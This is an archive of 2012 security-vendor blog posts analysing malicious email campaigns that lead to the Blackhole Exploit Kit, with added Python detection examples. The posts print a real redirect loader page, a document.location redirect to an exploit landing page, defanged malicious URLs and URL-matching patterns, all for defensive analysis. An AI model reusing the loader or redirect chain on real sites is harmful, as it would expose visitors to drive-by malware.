
September 2012 Posts

BBB malicious spam flood
Posted: 24 Sep 2012 07:12 AM

U.S. and Canadian businesses are once again being targeted by a barrage of malicious BBB (Better Business Bureau) complaint notifications, a lure that plays on their concern for their reputation and for handling customer disputes promptly.


While BBB campaigns have been circulating for a good many years (for example, this 2008 certificate scam), the Websense® ThreatSeeker® Network has detected and intercepted a marked increase in malicious BBB email this month. Earlier in September, the ThreatSeeker Network was protecting customers from thousands of these malicious emails each day. Today, after a sharp escalation, it is protecting them from hundreds of thousands of BBB messages per hour.

 

In an attempt to look authentic, the messages include an official graphic from the BBB Web site but, as is often the case with malicious email campaigns, they also include suspicious grammar: "about your company possible involvement in check cashing and Money Order Scam."



 

Additionally, a number of different subjects have been utilized for this campaign, presumably in an attempt to thwart detection, including random "Complaint IDs," which you can see in the following sample set:


 

As with other similar malicious campaigns themed around ADP, Twitter, and LinkedIn, the techniques, tools and redirection path are much the same. The Cutwail spambot and the Blackhole exploit kit are currently the main weapons used by cybercriminals in malicious spam.

 

 

Redirection paths:

 

1) The link in the email points at a compromised site:

hxxp://vargasvilcolombia.com/PykKDZe/index.html

2) That index.html shows only a "WAIT PLEASE / Loading..." message and pulls in two external scripts from two more compromised hosts:

<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp://www.adahali.com/NQ9Ba2ap/js.js"></script>
</html>

3) The js.js script then sends the browser on to the exploit kit landing page:

document.location='hxxp://108.178.59.11/links/deep_recover-result.php';

(Please refer to our previous blog post to learn more about the landing page)
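To make a chain like the one above easier to reason about, here is an added example (my own code, not from the Websense post) that replays a captured redirection path offline: it pulls `<script src>` and `<iframe src>` targets out of each HTML stage and `document.location`-style assignments out of each script, and walks them breadth first until it reaches a URL it has no body for, which in this campaign is the exploit kit landing page. The stage-1 HTML and the stage-3 `document.location` line are the ones quoted above, kept hxxp-defanged so nothing here is a live link; mapping both js.js URLs to that same line is an assumption, since the post does not reproduce the js.js files themselves.

```python
import re
from html.parser import HTMLParser

# First-stage page and stage-3 redirect line as quoted in the post (hxxp-defanged).
# The js.js bodies are not in the post; both are assumed to be the stage-3 line.
STAGE1_URL = "hxxp://vargasvilcolombia.com/PykKDZe/index.html"
STAGE1_HTML = """<html>
<h1>WAIT PLEASE</h1>
<h3>Loading...</h3>
<script type="text/javascript" src="hxxp://pst.org.br/Wi4aFSLZ/js.js"></script>
<script type="text/javascript" src="hxxp://www.adahali.com/NQ9Ba2ap/js.js"></script>
</html>"""
STAGE2_JS = "document.location='hxxp://108.178.59.11/links/deep_recover-result.php';"

CAPTURED = {
    STAGE1_URL: STAGE1_HTML,
    "hxxp://pst.org.br/Wi4aFSLZ/js.js": STAGE2_JS,
    "hxxp://www.adahali.com/NQ9Ba2ap/js.js": STAGE2_JS,
}


class SrcCollector(HTMLParser):
    """Collect <script src> and <iframe src> targets from one HTML stage."""

    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        attrs = {k.lower(): v for k, v in attrs}
        if tag.lower() in ("script", "iframe") and attrs.get("src"):
            self.targets.append(attrs["src"])


# Redirect statements a second-stage script may use to hand the browser on.
_JS_REDIRECTS = (
    re.compile(r"""(?:document|window|top|self)\.location(?:\.href)?\s*=\s*(['"])([^'"]+)\1"""),
    re.compile(r"""location\.replace\(\s*(['"])([^'"]+)\1\s*\)"""),
)


def html_targets(html):
    p = SrcCollector()
    p.feed(html)
    return p.targets


def js_redirect_targets(js):
    found = []
    for rx in _JS_REDIRECTS:
        found.extend(m.group(2) for m in rx.finditer(js))
    return found


def next_hops(body):
    # Run both extractors on every body: the HTML parser finds nothing in plain
    # JS, and the JS regexes also catch redirects inside inline <script> blocks.
    return html_targets(body) + js_redirect_targets(body)


def walk_chain(start_url, captured, max_depth=5):
    """Replay the redirection path offline, breadth first.  `captured` maps URLs
    to the bodies retrieved for them; a URL with no body is a chain end we did
    not (or could not) fetch, e.g. the exploit kit landing page."""
    chain, queue, seen = [], [(start_url, 0)], set()
    while queue:
        url, depth = queue.pop(0)
        if url in seen or depth > max_depth:
            continue
        seen.add(url)
        body = captured.get(url)
        chain.append({"url": url, "depth": depth, "captured": body is not None})
        if body is not None:
            queue.extend((hop, depth + 1) for hop in next_hops(body))
    return chain


def chain_ends(chain):
    """URLs the chain reaches but for which no body was captured."""
    return [c["url"] for c in chain if not c["captured"]]


if __name__ == "__main__":
    for hop in walk_chain(STAGE1_URL, CAPTURED):
        note = "" if hop["captured"] else "(not captured)"
        print("  " * hop["depth"] + hop["url"], note)
```

Feed `walk_chain` a `captured` dictionary built from your own proxy or sandbox captures and `chain_ends` gives you the landing-page URLs to block or submit for analysis; the `seen` set keeps two js.js files that both point at the same landing page from producing it twice.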

 

As is very common these days, the landing page for this particular campaign hosts the recently updated Blackhole Exploit Kit v2.0, which in turn drops the actual malware. More information about the malware files that get pushed to the computer can be found in our ThreatScope reports:

 

ThreatScope report for initial file

ThreatScope report for additional payload

 

 


Artem Gololobov

Fake 'KLM e-Ticket' attempts to install backdoor
Posted: 21 Sep 2012 04:16 AM

Fake airline e-ticket emails carrying malicious attachments are far from new. However, the Websense® ThreatSeeker® Network has detected a significant campaign purporting to come from KLM, the Dutch flag carrier. We estimate that we intercepted more than 850,000 messages from this campaign on Monday, September 17, alone.

 

Each malicious message, with a subject 'KLM e-Ticket', appears to use a legitimate KLM e-ticket layout, but itinerary information is not displayed. Instead, users are enticed to view the itinerary in an attachment and subsequently risk compromising their machines. Although this scam does not specifically target KLM customers, those who have made recent ticket purchases as well as recipients who may fear that an unauthorized credit card purchase has been made could fall victim. Websense customers are protected from this and other threats by ACE™, our Advanced Classification Engine.

 

We analyzed a sample set of messages, and noted that each 'e-ticket' contained unique values in the passenger and receipt sections (presumably an attempt to avoid detection), along with a malicious zipped attachment named 'KLM-e-Ticket_<NumericalValue>.zip'.

 

 

 

Two different malicious binaries have been extracted from the attachments in this campaign. Both are named 'KLM-e-Ticket.pdf.exe' and both give the attacker remote shell (command line) access to the compromised machine over TCP port 8000, reachable with a plain telnet client. The double extension is meant to pass the file off as a PDF, yet neither binary even bothers to use an Adobe Reader or similar icon!

 

It is worth noting that the same binaries have been used in recent 'Microsoft Services Agreement' and 'Telstra Online Account' campaigns based on submitted filenames.
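The 'KLM-e-Ticket.pdf.exe' naming is the detail worth automating a check for. The following is an added example (not code from the post) that opens a zipped attachment in memory and flags members whose name hides an executable extension behind a document one, whose final extension is executable at all, or whose first bytes carry the MZ header of a Windows executable regardless of what the name claims. The sample zip is constructed here; its executable member is a fake MZ stub, not the backdoor, and the extension lists are this example's own choice.

```python
import io
import zipfile

# Extensions an attachment might use to look like a document, and the ones
# Windows will actually execute.  Both lists are this example's own choice.
DOC_EXTS = {"pdf", "doc", "docx", "xls", "xlsx", "txt", "htm", "html", "jpg", "rtf"}
EXEC_EXTS = {"exe", "scr", "com", "pif", "bat", "cmd", "js", "vbs", "jar"}


def extensions(filename):
    """'KLM-e-Ticket.pdf.exe' -> ['pdf', 'exe'], lower-cased, directory part stripped."""
    base = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return base.split(".")[1:]


def attachment_findings(zip_bytes):
    """Return {member name: [reasons]} for every file inside a zipped attachment."""
    findings = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            with zf.open(info) as fh:
                head = fh.read(2)
            exts = extensions(info.filename)
            last = exts[-1] if exts else ""
            reasons = []
            # 'something.pdf.exe': a document-looking extension hiding an executable one
            if len(exts) >= 2 and last in EXEC_EXTS and exts[-2] in DOC_EXTS:
                reasons.append("deceptive double extension")
            if last in EXEC_EXTS:
                reasons.append("executable extension")
            # Trust the bytes, not the name: MZ is the DOS/PE header Windows runs.
            if head == b"MZ":
                reasons.append("PE header (MZ)")
                if last in DOC_EXTS:
                    reasons.append("executable content behind document extension")
            findings[info.filename] = reasons
    return findings


def should_block(findings):
    return any(reasons for reasons in findings.values())


def build_sample_zip():
    """Constructed stand-in for the campaign's 'KLM-e-Ticket_<n>.zip'. The
    executable member carries only a fake MZ header, not the real backdoor."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("KLM-e-Ticket.pdf.exe", b"MZ" + b"\x90" * 62 + b"fake-pe-stub")
        zf.writestr("itinerary.txt", b"Flight details follow.\n")
    return buf.getvalue()


SAMPLE_ZIP = build_sample_zip()

if __name__ == "__main__":
    for name, reasons in attachment_findings(SAMPLE_ZIP).items():
        print(name, "->", ", ".join(reasons) or "clean")
```

The MZ check is the one that survives renaming: an attacker who drops the '.exe' and ships 'KLM-e-Ticket.pdf' with executable content still gets flagged, which the name-based rules alone would miss.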

 

Websense ThreatScope™, our online sandbox, also flags the files' behavior as suspicious: http://aceinsight.websense.com/fileanalysisreport.aspx?rid=91198D21288F4CE384D7D80D983A1E86


Carl Leonard

Watch out for malicious UPS/FedEx notifications when waiting for iPhone 5
Posted: 18 Sep 2012 05:05 PM

The first batch of iPhone 5s will be delivered on Friday of this week. Apple sold more than 2 million of the new phone in less than 24 hours so clearly there's a huge interest in getting the device. This means that many people are eagerly waiting for their shipping notifications, to learn when the phone will arrive. I'm one of the people who pre-ordered an iPhone 5, and I'm still waiting for my delivery notification. From reading discussion forums online, I know that all orders from Apple's online store will ship with UPS. So when I received a UPS notification email today, I obviously expected it to be about my iPhone. Turns out, it wasn't.

 

 

Instead the email contained an attached HTML page that, when loaded, displayed the page below:

 

 

When I look at the emails monitored by our Cloud Email Security service, I can see that we've intercepted and blocked over 45,000 emails similar to this one. UPS/FedEx lures are not new, but in times like this -- when people are eagerly waiting for an email of this type -- the risk is great that recipients will have their guards down and will run the attached file.

 

The page above isn't as innocent as it looks. There's a hidden, obfuscated script on the page that deobfuscates to this:

 

 

We can see that it loads an iframe from a .RU domain, which is a Blackhole Exploit Kit site that pushes a banking trojan to the PC. See our ThreatScope report for more information and hashes. On a side note, the phrase used for the .RU domain name translates to "money on account". Banking trojan, money on account... there's no doubt that the motivation for this exploit is financial!

 

Our recommendation is to be extra careful if you're waiting for a delivery notification, and don't run any attachments contained in those types of emails.


Patrik Runald

Internet Explorer zero-day vulnerability
Posted: 17 Sep 2012 10:13 PM

A new, unpatched vulnerability in Microsoft Internet Explorer affects versions 6, 7, 8, and 9. It allows an attacker to execute arbitrary code on the machine simply by getting the user to visit a malicious web page, for example by tricking the user into clicking a link in an email or by planting the exploit on a compromised legitimate website.

 

 

The vulnerability itself lies in the way that Internet Explorer accesses an object that has been deleted or not properly allocated (a use-after-free condition). A Metasploit module for it has now been published, which means a working exploit is publicly available, and we anticipate that this Internet Explorer vulnerability will soon be used in broader attacks. More information can be found in Microsoft Security Advisory 2757760.

 

We have released updates to the real-time analytics of ACE™, our Advanced Classification Engine, which means that Websense customers are protected. As a member of the Microsoft Active Protection Program (MAPP), we are also working with Microsoft to monitor this situation.

 

UPDATE:

On Friday, September 21, 2012, Microsoft released an out-of-band patch, MS12-063, to address this vulnerability. The vulnerability described above, tracked as CVE-2012-4969, was fixed along with four other Internet Explorer vulnerabilities. We recommend applying this patch to your environment as soon as possible.


Patrik Runald

Voice Mail Notifications and ADP Emails Lead to Blackhole Exploit Kit
Posted: 13 Sep 2012 02:00 PM

Since Blackhole Exploit Kit 2.0 was recently introduced, we wanted to give our readers a few examples of how they might get exposed to this threat through email.

 

The Websense® ThreatSeeker® Network has recently intercepted several malicious email campaigns that try to lure victims to web pages hosting this popular exploit kit. Some of the themes were new to us, and some familiar.

 

One posed as voice mail notifications from Microsoft Exchange servers, another mimicked ADP invoice reminders, and a third thanked the recipient for signing up for a premium service of accountingWEB.com. Like other malicious social engineering campaigns, these email campaigns try to lure victims to click links that ultimately lead to pages hosting Blackhole Exploit Kit. A lot of the email messages pretend to come from trusted sources (well-known establishments, or the victim's own infrastructure), and try to catch the reader off-guard by focusing their attention on something urgent, like money matters.

 

Websense customers are protected from these threats by ACE™, our Advanced Classification Engine.

 

The malicious emails contain links that redirect to Blackhole pages with new obfuscation, but we don't think these are Blackhole 2.0. We suspect it won't be long, though, until we come across similar campaigns that use the new version.

 

ADP is one of the largest names in payroll services, so it's no surprise that a spoofed ADP notification email is used as a lure.

Here's an example marked as high priority, with the subject line "ADP Invoice Reminder":

 

 

Let's follow one of the possible redirection paths:

hxxp://allbarswireless.com/HXwcDdQ/index.html
hxxp://ash-polynesie.com/AjVSXvus/js.js
hxxp://108.60.141.7/tfvsfios6kebvras.php?r=dwtd6xxjpq8tkatb
hxxp://108.60.141.7/links/differently-trace.php

Please refer to our previous blog post to learn more about the landing page.

 

Here's a different lure - emails pretending to come from the victim's Exchange server, telling them that they have new voice mail. The text invites the reader to click the link: "Double click on the link to listen the message."

Subject lines include "Voice Mail from NNN-NNN-NNNN (NN seconds)":

 

 

 

The redirection chain here is similar:

hxxp://www.tryakbar.com/tLbM3r/index.html
hxxp://sportmania.so/JP3q2538/js.js
hxxp://173.255.221.74/tfvsfios6kebvras.php?r=rs3mwhukafbiamcm

The landing page shows similar content to the previous example. See here.

 

Another scheme thanks the user for signing up for a premium service.

Subject lines include "Thank you for activating paid services":

 

 

 

Different redirection chain, but the landing page hosts Blackhole, with a very familiar path:

hxxp://www.svstk.ru/templates/beez/check.php
hxxp://bode-sales.net/main.php?page=3c23940fb7350489

 

And finally, the familiar theme of FDIC notifications claiming your wire transfer ability was suspended.

Subject lines include "You need a new security version," "Suspended transactions," and "Urgent! You must install a new security version!"

 

 

Here again, simple redirection leads to typical "/main.php?page=" type URLs.

hxxp://kahvikuppi.org/achsec.html
hxxp://afgreenwich.net/main.php?page=0f123fe645ddf8d7

Note that, because Blackhole 2.0 generates its URLs dynamically, we are now much more likely to see URLs like those in the first two examples than the /main.php?page= style of the latter two.
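The /main.php?page=<16 hex> shape is easy to match in proxy logs, and dynamic URL generation is precisely what takes that rule away. The added example below (my own detection logic, not Websense's) shows both approaches over a constructed proxy log built from the URLs quoted in this post: a signature on the 1.x landing URL, plus a per-client sequence rule that fires when one client fetches /<random>/index.html, then /<random>/js.js from another host, then any .php page within a minute. The 6-8 character, mixed-case-or-digit test on the random path segment is a heuristic chosen from the samples on this page; the clients, timestamps and the two benign example.com lines are made up.

```python
import re
from collections import defaultdict

# Constructed proxy log (epoch client method url status), built from URLs quoted
# in the post above plus two benign lines; clients and timestamps are made up.
SAMPLE_LOG = """\
1347546000 10.0.0.5 GET http://allbarswireless.com/HXwcDdQ/index.html 200
1347546001 10.0.0.5 GET http://ash-polynesie.com/AjVSXvus/js.js 200
1347546002 10.0.0.5 GET http://108.60.141.7/tfvsfios6kebvras.php?r=dwtd6xxjpq8tkatb 200
1347546003 10.0.0.5 GET http://108.60.141.7/links/differently-trace.php 200
1347546010 10.0.0.6 GET http://afgreenwich.net/main.php?page=0f123fe645ddf8d7 200
1347546020 10.0.0.7 GET http://www.example.com/static/index.html 200
1347546021 10.0.0.7 GET http://www.example.com/assets/js.js 200
"""

# Pre-2.0 landing page shape: main.php?page=<16 hex>.  Blackhole 2.0's dynamic
# URL generation is exactly what makes this signature stop working.
BH1_LANDING = re.compile(r"/main\.php\?page=[0-9a-f]{16}(?:[&#]|$)")
# Redirector stages seen in the campaigns above: /<6-8 random chars>/index.html
# followed by /<6-8 random chars>/js.js on a second host.
STAGE_PATH = re.compile(r"^/([A-Za-z0-9]{6,8})/(index\.html|js\.js)$")
PHP_HIT = re.compile(r"\.php(?:\?|$)")


def url_path(url):
    m = re.match(r"^[A-Za-z]+://[^/]+(/.*)?$", url)
    return (m.group(1) or "/") if m else url


def classify(url):
    """Label a URL as a known landing page, a redirector stage, a generic PHP hit, or None."""
    path = url_path(url)
    if BH1_LANDING.search(path):
        return "bh1-landing"
    m = STAGE_PATH.match(path)
    if m:
        seg = m.group(1)
        # The random segments in the posts mix case or carry digits; an all-lowercase
        # word such as /static/ is far more likely to be a legitimate site (heuristic).
        if seg != seg.lower() or any(c.isdigit() for c in seg):
            return "stage-index" if m.group(2) == "index.html" else "stage-js"
        return None
    if PHP_HIT.search(path):
        return "php"
    return None


def in_order(labels, wanted):
    """True if `wanted` appears in `labels` as an ordered subsequence."""
    pos = 0
    for label in labels:
        if label == wanted[pos]:
            pos += 1
            if pos == len(wanted):
                return True
    return False


def detect(lines, window=60):
    """Alert on a bare Blackhole 1.x landing URL, or when one client walks
    index.html -> js.js -> some .php page within `window` seconds."""
    alerts, history = [], defaultdict(list)
    for line in lines:
        if not line.strip():
            continue
        ts, client, _method, url, _status = line.split()
        ts = int(ts)
        label = classify(url)
        if label is None:
            continue
        if label == "bh1-landing":
            alerts.append({"client": client, "rule": "blackhole-landing-url", "urls": [url]})
            continue
        recent = [h for h in history[client] if ts - h[0] <= window]
        recent.append((ts, label, url))
        if label == "php" and in_order([h[1] for h in recent], ["stage-index", "stage-js", "php"]):
            alerts.append({"client": client, "rule": "redirect-chain", "urls": [h[2] for h in recent]})
            recent = []  # one alert per chain; later landing-page hits belong to it
        history[client] = recent
    return alerts


if __name__ == "__main__":
    for a in detect(SAMPLE_LOG.splitlines()):
        print(a["client"], a["rule"])
        for u in a["urls"]:
            print("   ", u)
```

The sequence rule is deliberately blind to the final hostname and filename, since those are what the kit randomises; it keys on the behaviour (two tiny redirector fetches on compromised sites followed by a PHP hit on a third host) that the lures above share whatever version of the kit sits at the end.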

 

 

 

Blackhole Exploit Kit updates to 2.0
Posted: 13 Sep 2012 12:19 AM

Here at Websense Security Labs, we like to keep our ears to the ground for new threats. Yesterday, another research blog announced that a new version of the infamous Blackhole Exploit Kit had been released. The advertisement for the new version was posted, in Russian, on an underground forum. For those who may be unaware, Blackhole is by far the most popular web-based exploit kit on the black market to date.

 

A few of the interesting updates to the exploit kit are noted here:

 

  1. Dynamic URL generation, so there is no longer a standard URL pattern that can be used to identify the kit.
  2. IP blocking at the executable URL, so that antivirus companies cannot simply download the binary; this is meant to slow down AV detection.
  3. Use of a CAPTCHA on the admin panel login page, to prevent brute-force attempts at unauthorized access.

 

For a full listing of updates, you can view the English translated advertisement here.

 

We put some feelers out in our ThreatSeeker network to see what we could find and to determine whether there were any changes in the code that Blackhole uses. Sure enough, we found malicious links in a recent email campaign that led to Blackhole with new obfuscation. The creator of this kit changes the obfuscation as often as a model changes clothes at a fashion show!

 

 

 

That said, we can't confirm that this example is in fact version 2.0, although it won't be much of a surprise to see the new version of the kit using this new obfuscation. From the looks of the de-obfuscated code below, this one may not be 2.0: notice the use of PluginDetect on line 5, whereas the advertisement states that the author no longer uses it.

 

 

Websense® ThreatSeeker® Network is constantly on the lookout for threats like this, so that we can protect our customers using ACE™, our Advanced Classification Engine.

Chris Astacio

Fake ‘Amazon order’ email exploits recent Java vulnerability CVE-2012-4681
Posted: 02 Sep 2012 09:44 PM

 

Following our recent blog posts on the propagation of the Java vulnerability CVE-2012-4681 (New Java 0-day used in small number of attacks) and its subsequent inclusion in the infamous Blackhole Exploit Kit (New Java 0-day added to Blackhole Exploit Kit), the Websense® ThreatSeeker® Network has detected a new malicious email campaign purporting to be an order verification email from Amazon. Its link directs victims to a page containing the recent Java exploit.

 

If successful, this exploit could allow the cyber-criminals behind this campaign to deliver further malicious payloads to the victim’s machine which, for example, could lead to the exfiltration of personal and financial data.

 

Oracle has released an out-of-band patch for this Java vulnerability (Oracle release Java 1.7.0_07 to fix CVE-2012-4681), and Websense customers are protected from this and other threats by ACE™, our Advanced Classification Engine.

 

On September 1, the Websense® ThreatSeeker® Network intercepted over 10,000 malicious emails with the subject ‘You Order With Amazon.com’, enticing the recipient to ‘click here’ to verify a fictitious order, as shown in this sample:

 

 

 

Once the victim clicks the link, they are redirected to an obfuscated page hosting the Blackhole Exploit Kit, in this case hxxp://atjoviygdm.dnset.com/main.php?page=8e2cf5bb67d777a4. The payload view below highlights the Java archive ‘Leh.jar’, which is used to exploit CVE-2012-4681 if the victim’s machine is vulnerable; an analysis of this file can also be found on VirusTotal.

 

 

The obfuscated JavaScript above (de-obfuscated version below) profiles the visiting machine, determining the browser type and version as well as the installed Adobe Flash, Adobe Reader and Java versions, and then uses that information to select the ‘best’ exploit for this particular victim.

 

 

 

This email campaign further illustrates the ingenuity and speed at which cyber-criminals package and propagate malicious content along with social-engineering techniques in order to exploit both recent software vulnerabilities and the trusting nature of end-users.

 

©2013 Websense, Inc. All Rights Reserved.